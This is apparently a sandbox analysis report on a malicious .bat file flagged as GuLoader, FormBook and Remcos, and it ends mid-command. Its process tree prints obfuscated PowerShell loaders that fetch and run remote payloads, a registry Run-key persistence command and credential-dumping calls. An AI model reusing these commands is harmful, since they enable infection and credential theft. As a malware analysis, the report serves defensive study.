Windows Analysis Report
MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.bat

Overview

General Information

Sample name: MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.bat
(renamed because original name is a hash value)
Original sample name: MATALJ Kft Rendels H634667478874873845985309802Thayne.bat
Analysis ID: 1449968
MD5: cf28f43ef2773834bf4a17ee4e73f974
SHA1: b6c535298286f990f8fa81a380c8a13b62aadf5d
SHA256: 0dc63c418ee423f0f461062eafc49a9804db70331ccf9188544725804e062127
Tags: bat GuLoader HUN

Detection

FormBook, GuLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
Creates multiple autostart registry keys
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 1908 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2084 cmdline: powershell.exe -windowstyle hidden "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. 
A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. 
Ph lHSag,regenteaC erudNdlideSt.ncrRv kasDea,l[Zoo o$S,gmoLVerbar pollrRublae C.pudgarvesVenstk TresjKrabao leazlNongae SandrSpisenBrysteTar.isAnska]Socia=.mfan$jail,fTykneeL gmesKv knt Rosed Brisr Alena Ver gunpurt Urlie EnvonS,rafs Uvil ');$Laserjet=Sortkridtstegningens 'Indri$BegohSO.herkSansei EnerfS eketExigeeFlasktMonar1Tilba4 .isk.reconDStratowaff w HermnUdspilp,lygoAng.va BunddmirisFA.glui .otolAwesoe igh(Numis$T,gvohFrimey.dninp Embre S,earGood.mBinnon redeeHestesSkovtiAdopta Alte,Trudy$ AbonA.uggslOmnivmpomo,eIndlanIscenvSti.leinkublNapht)Ggede ';$Almenvel=$Ruinhobens[0];Caprellidae (Sortkridtstegningens 'Resin$ Praeg enstlZechsoMisseb E.deaPreanlAmtsv:LacriS Rottk NatiiSkalklHedipd EquipSt,pua Afsld DiscdAn,iteFryserHomoonGo.rie .ela2 Ph l4 O te9Sitzy=Grund(.odtgTKill eFro tsSyllitDisci-Prep,PKri.saSemiptSubvehPassi Forsl$CanccAOverml GamamNath eOrdgynFunktvSma.seKultul,dled) Bra. ');while (!$Skildpadderne249) {Caprellidae (Sortkridtstegningens 'Forha$SedergRev llOsciloAngakbKamgaaPa irlTaggy:TrappMChessoGatchlAntagdfugtsaHyttevkrickiKulsotAnskueamput=.kyph$.abent TranrDanseuA.kaneAller ') ;Caprellidae $Laserjet;Caprellidae (Sortkridtstegningens 'UpthrS isaptFlsk.aBrillrUdbldtVareb-Dest SKaut lslagteUpaakeInsinpFirep a bum4 Bund ');Caprellidae (Sortkridtstegningens '.etsp$WheregGaleolOdyssoBan bbJo,ana sy elUnsta:opgivS SspekFl eribigb,lM jusdAssaup.vmmea Sc,nd nterd Nonpe P,llrO hobnAsconemacul2Randy4F.yve9Phone=Blond(WaggoTMo,ioeBlancsChichtplumb- ArbePPreadaUnirrtTinfohK,lon Paras$ColeoAKamg.l Hor mAd neekom.dnOvercvLatcheStatelNo,co)Venog ') ;Caprellidae (Sortkridtstegningens ' Menu$kbarsgSolcrlGad toTecasb Tag aMortalFlues:TestaUInterdWavineUncurnBroded,tochr.errgsBarysa bl lr RaadbPrebeegillsjHaem,dSangleHydat= kand$KroatgGangblAnaxto GridbKonk aSko.glProto:SnitzlArgotyToldea Bra.nCredicW.lloeslalo+Phane+Ubetn%Grx,a$Term.GSengiyTilbarInforoAdenosl thocSvineobantip,ilatiRubbec Ch,k.MarkscHidrooFre.ru daninGalentUnhoo ') 
;$hypermnesia=$Gyroscopic[$Udendrsarbejde];}$Exaltee=316524;$Umyndiges=29862;Caprellidae (Sortkridtstegningens 'F.rme$ F.digBu del FremoHa.tebCellea Rovil.ileu: offiJProh.eForfrdfun.teExpun T,ops=repai OutpGMyoseeBeskytF,rkl-indusCFraado Gul.nObsert Un,eeHe atnUslintSprin Pend$ andAHy,solkomp.mSku,geDumphnSnusevM trie.estilKrist ');Caprellidae (Sortkridtstegningens 'Trlkv$ Ov rgFi,zelintrooUtaalbbenigaYawpelNveny:kerateFedertHypereL vsar bsecn,hodei,lgest.achifStrygaLandsbIrrevrAlbueiThermkGo,dak.ersoeProspn I.ds Upisl=Unter .acop[ Bo bSHusary A chsGracitHamareExonem Slut.RaesoCAveceoB,mstn indev triueT,ldnrPre it Klas]Regi.:Stamb:IrratFIntr rForbloIotizmAllerBTfleda Unbastrafie,prin6Reduk4ReverS PsamtO erlrc.imbiWashbnAttrig lowe(Choke$Ram.iJS.anse RygedB weaeMagda)Store ');Caprellidae (Sortkridtstegningens ' ,ant$SeelfgSta,glL ndmoSta.abPhonoaA.lbelNi ot:k.rtoi ,nterRep.srUnclaehasles,oloutBlomsrspildaTeleoiLimnonE.ikka Nyl.bsuppolBevogyReve Ideli=Thyro Sy te[L,atuSTestuyasilisJona tTalkieSkarpmC.she. WaggT Serie MajoxUnasstRea,d.TrianEUdvikn Bi lc ForsoFremtdVicefiUdko.nParalgDati,]Udstd:S art:Cari,A Cen.SRy.keCal,enIFuldsISlide.B reaGFoto eDomintsprjtSUnthitSnowbrGunati DynenFevergInd k( Ting$ShavueRetrotUkurae VarmrAdlesnbarneiDan.rt Tetrf Teata.tiftbBomberKemikiPrstakBr,mlk Tr,aeBatchnS.ant)Chaus ');Caprellidae (Sortkridtstegningens ' Frem$N,llegDif elJermaoCruncbMotifaExhe lUpr.o: UnexA inglrTemalbCaliceOver jPrintdKo,resForreg Faldi.lerbvSki deK lorrCustof,pgefoTr,nkrbagnie .eopn Rasti ,raanMono gKolersGes,a=Balla$ In.iiTastarBriocrF rieeAsbolsPara,tSapotrSpeciaSama,i TyttnMa.blaRafflbNosomlforgry Vari.MarhesShalluRammeb t,les Ci atSpousrTryk i P.rfnSty.sgSer.a(Flypa$GavntEMulisxUndera Set l Car tAri,teVektoef,ust,sjlea$ septU Scism Phaey Odo,nWaketd G.ati LedegNati.eYaupos Ag i)Juice ');Caprellidae $Arbejdsgiverforenings;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7140 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indisposedness.Ass && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 4972 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio El.f/ Scri2Kaily0Signa1Beb,u0Apnea0Ne,tu1Headw0Tre s1Freml TreadFRecoiiJargorApnoeeSnorkfWhiffoLeysex Bioe/Aspar1Fetic2Pseu.1Udstt. Tope0Snic, ';$Lrredskjolernes=Sortkridtstegningens ' ScleUSpn.msRepedeEne gr Mell-UndreAFluidgFors.eAndennsupert Brav ';$hypermnesia=Sortkridtstegningens 'SemiahSlangtLoosstLage.p Pnhe:Xwfin/Dummk/Polym1 C,pt9Thges4Elect.inval5Repet9 Eksa. Mugg3ligro0 Thom.Bevge6Gulli/M.nkeU SagrnTr lacInk,tobeanfmAarsaiSandscLaiba.LandgmBombedFingepForly ';$Aktiveret=Sortkridtstegningens 'Freqe>fredn ';$Fligene=Sortkridtstegningens ' Molyi ForheTopsax pers ';$Opvarmningsmssige='Mongolisms';$Haandvrksbagere = Sortkridtstegningens 'MediceFibe c Escah SmleoDomin Paste% Unp.a DemepChelipDecardSubfla UnactSu.liaUndon%,rmme\TekstI SelvnIndigd droniUdsvisTyknipBraknoOnestsRenteeSkibsdDeempnKog.ieGennesDyingsTh mu. 
A,svAempris Rings Emu, Peng&Skyfo&Pusli SteereaflvncTh.nahSkeleoSideo Alb.mtAftvt ';Caprellidae (Sortkridtstegningens 'sekst$LagergDecimlSpectoAsem bEftera,usiolFlam :WorthRDoms,uKnle ia solnPleathCiviloSnedkbKaroleTyndsnGrasssConch= arve(BloodcRaidemSydyedStrkk Pik p/fjortcPerco Appre$Dial,HKuardaA.olia Lv,an.hyrod,igtov JoshrObtaik Fjersfi.msbSt rtaConsugBe eveGryderUngdoemixyp)Umb.l ');Caprellidae (Sortkridtstegningens 'Opmun$SpildgStilllScienoSpilob nkomaVent lHksun:NondiGResoryHellirGglero HonosOu,pucsvkk oCommep Berei smudc ,ini=Pyr o$Sy,tahUnprayPluc p,uraceSynedrBerigmAe opneryt eAngolsBothiiSkefua Domf.E.gotsBede.pSjofelS.ndiijo.rnthydro(Prokl$ AfleAAmts.kBlomstErodeiAtonav toreNonscr atsaeFor ktCon e)Oscil ');$hypermnesia=$Gyroscopic[0];$Charcia= (Sortkridtstegningens ' Most$Mislig WhirlS,geeoHaandb,olicaZ.omelBoard:M elfSCard.kUdarmiR.ssof FugetImpreeUnanntSinca1 B ll4Noedv=V rboNUndereprojiwSyste-PumpeOBaro.bKlassjHumaneForurcNoncrtEl ct SangvS Vriky DistsTh.wlt,ndsteFilodmkvali.,oderN Exhae Sk,btpleur.O,erpWUn.enePaaklbinverCEndomlamblyiDrillegellynUvet,t');$Charcia+=$Ruinhobens[1];Caprellidae ($Charcia);Caprellidae (Sortkridtstegningens ' S,ri$Ansa.STarikkB.njoiSk rpfRealitKartveVariet Dove1Puggi4Nonve. 
Ph lHSag,regenteaC erudNdlideSt.ncrRv kasDea,l[Zoo o$S,gmoLVerbar pollrRublae C.pudgarvesVenstk TresjKrabao leazlNongae SandrSpisenBrysteTar.isAnska]Socia=.mfan$jail,fTykneeL gmesKv knt Rosed Brisr Alena Ver gunpurt Urlie EnvonS,rafs Uvil ');$Laserjet=Sortkridtstegningens 'Indri$BegohSO.herkSansei EnerfS eketExigeeFlasktMonar1Tilba4 .isk.reconDStratowaff w HermnUdspilp,lygoAng.va BunddmirisFA.glui .otolAwesoe igh(Numis$T,gvohFrimey.dninp Embre S,earGood.mBinnon redeeHestesSkovtiAdopta Alte,Trudy$ AbonA.uggslOmnivmpomo,eIndlanIscenvSti.leinkublNapht)Ggede ';$Almenvel=$Ruinhobens[0];Caprellidae (Sortkridtstegningens 'Resin$ Praeg enstlZechsoMisseb E.deaPreanlAmtsv:LacriS Rottk NatiiSkalklHedipd EquipSt,pua Afsld DiscdAn,iteFryserHomoonGo.rie .ela2 Ph l4 O te9Sitzy=Grund(.odtgTKill eFro tsSyllitDisci-Prep,PKri.saSemiptSubvehPassi Forsl$CanccAOverml GamamNath eOrdgynFunktvSma.seKultul,dled) Bra. ');while (!$Skildpadderne249) {Caprellidae (Sortkridtstegningens 'Forha$SedergRev llOsciloAngakbKamgaaPa irlTaggy:TrappMChessoGatchlAntagdfugtsaHyttevkrickiKulsotAnskueamput=.kyph$.abent TranrDanseuA.kaneAller ') ;Caprellidae $Laserjet;Caprellidae (Sortkridtstegningens 'UpthrS isaptFlsk.aBrillrUdbldtVareb-Dest SKaut lslagteUpaakeInsinpFirep a bum4 Bund ');Caprellidae (Sortkridtstegningens '.etsp$WheregGaleolOdyssoBan bbJo,ana sy elUnsta:opgivS SspekFl eribigb,lM jusdAssaup.vmmea Sc,nd nterd Nonpe P,llrO hobnAsconemacul2Randy4F.yve9Phone=Blond(WaggoTMo,ioeBlancsChichtplumb- ArbePPreadaUnirrtTinfohK,lon Paras$ColeoAKamg.l Hor mAd neekom.dnOvercvLatcheStatelNo,co)Venog ') ;Caprellidae (Sortkridtstegningens ' Menu$kbarsgSolcrlGad toTecasb Tag aMortalFlues:TestaUInterdWavineUncurnBroded,tochr.errgsBarysa bl lr RaadbPrebeegillsjHaem,dSangleHydat= kand$KroatgGangblAnaxto GridbKonk aSko.glProto:SnitzlArgotyToldea Bra.nCredicW.lloeslalo+Phane+Ubetn%Grx,a$Term.GSengiyTilbarInforoAdenosl thocSvineobantip,ilatiRubbec Ch,k.MarkscHidrooFre.ru daninGalentUnhoo ') 
;$hypermnesia=$Gyroscopic[$Udendrsarbejde];}$Exaltee=316524;$Umyndiges=29862;Caprellidae (Sortkridtstegningens 'F.rme$ F.digBu del FremoHa.tebCellea Rovil.ileu: offiJProh.eForfrdfun.teExpun T,ops=repai OutpGMyoseeBeskytF,rkl-indusCFraado Gul.nObsert Un,eeHe atnUslintSprin Pend$ andAHy,solkomp.mSku,geDumphnSnusevM trie.estilKrist ');Caprellidae (Sortkridtstegningens 'Trlkv$ Ov rgFi,zelintrooUtaalbbenigaYawpelNveny:kerateFedertHypereL vsar bsecn,hodei,lgest.achifStrygaLandsbIrrevrAlbueiThermkGo,dak.ersoeProspn I.ds Upisl=Unter .acop[ Bo bSHusary A chsGracitHamareExonem Slut.RaesoCAveceoB,mstn indev triueT,ldnrPre it Klas]Regi.:Stamb:IrratFIntr rForbloIotizmAllerBTfleda Unbastrafie,prin6Reduk4ReverS PsamtO erlrc.imbiWashbnAttrig lowe(Choke$Ram.iJS.anse RygedB weaeMagda)Store ');Caprellidae (Sortkridtstegningens ' ,ant$SeelfgSta,glL ndmoSta.abPhonoaA.lbelNi ot:k.rtoi ,nterRep.srUnclaehasles,oloutBlomsrspildaTeleoiLimnonE.ikka Nyl.bsuppolBevogyReve Ideli=Thyro Sy te[L,atuSTestuyasilisJona tTalkieSkarpmC.she. WaggT Serie MajoxUnasstRea,d.TrianEUdvikn Bi lc ForsoFremtdVicefiUdko.nParalgDati,]Udstd:S art:Cari,A Cen.SRy.keCal,enIFuldsISlide.B reaGFoto eDomintsprjtSUnthitSnowbrGunati DynenFevergInd k( Ting$ShavueRetrotUkurae VarmrAdlesnbarneiDan.rt Tetrf Teata.tiftbBomberKemikiPrstakBr,mlk Tr,aeBatchnS.ant)Chaus ');Caprellidae (Sortkridtstegningens ' Frem$N,llegDif elJermaoCruncbMotifaExhe lUpr.o: UnexA inglrTemalbCaliceOver jPrintdKo,resForreg Faldi.lerbvSki deK lorrCustof,pgefoTr,nkrbagnie .eopn Rasti ,raanMono gKolersGes,a=Balla$ In.iiTastarBriocrF rieeAsbolsPara,tSapotrSpeciaSama,i TyttnMa.blaRafflbNosomlforgry Vari.MarhesShalluRammeb t,les Ci atSpousrTryk i P.rfnSty.sgSer.a(Flypa$GavntEMulisxUndera Set l Car tAri,teVektoef,ust,sjlea$ septU Scism Phaey Odo,nWaketd G.ati LedegNati.eYaupos Ag i)Juice ');Caprellidae $Arbejdsgiverforenings;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 4188 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indisposedness.Ass && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 7108 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • cmd.exe (PID: 6548 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 5028 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • wab.exe (PID: 6460 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ypvrsbyzkda" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 6332 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jrikttjaylsubj" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 2192 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tlouumuumtkhdxgwj" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wscript.exe (PID: 2144 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
            • powershell.exe (PID: 504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. 
usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Clamourers=Beshout ' tran$ LiniGmaskieamphinled meOph lrGlutti ,inicActivaUrinelRis,klyngliy .uto.LerkrDForkaoEme.owUnd.rn Behol Refoo PansaAtrordLge.rFesta,iRachel ColoeAd,rd( eral$,ogerGquadreHypocmTambu,Svovl$ ,symF V,mao Psykd AuspbUddeloDayfll iksedKhiraoSexfir BistgoptraaSlutrnKnoldiSplejsHippoa Venet ManniUafheo UnexnMinoreti sfrNdudgn OpmaeAp.ea)Bea,b ';$Fodboldorganisationerne=$Blafferen[0];Lovbundnes (Beshout 'Konce$EntergBeentlNonsuo FjelbSpuilaMulenlCirro: b gyN.rozaopolarnKotelokn.fic MaricB yaniSwi,ddAdditeAcadenVekset Min a Wi tl.ernelSelvsyMorai1Smrsy7 M ta2S.ill=P vot( OkseT PolyeTyr,fsImpedtCoten-PowerPTr.lda,orblt ,rdihSphac Bhmis$Se.erFSnag,oRettedLagerbUdr.goRef rlFanfadCattioSkomarDivu.g Pai,aHydronDatasi Ov rs,admoaKentatBrudliFjernoCou,tnB,ddeeBakeprKendenIndise St.m)Corne ');while (!$Nonoccidentally172) {Lovbundnes (Beshout ',runs$Skol gMicmal reado 
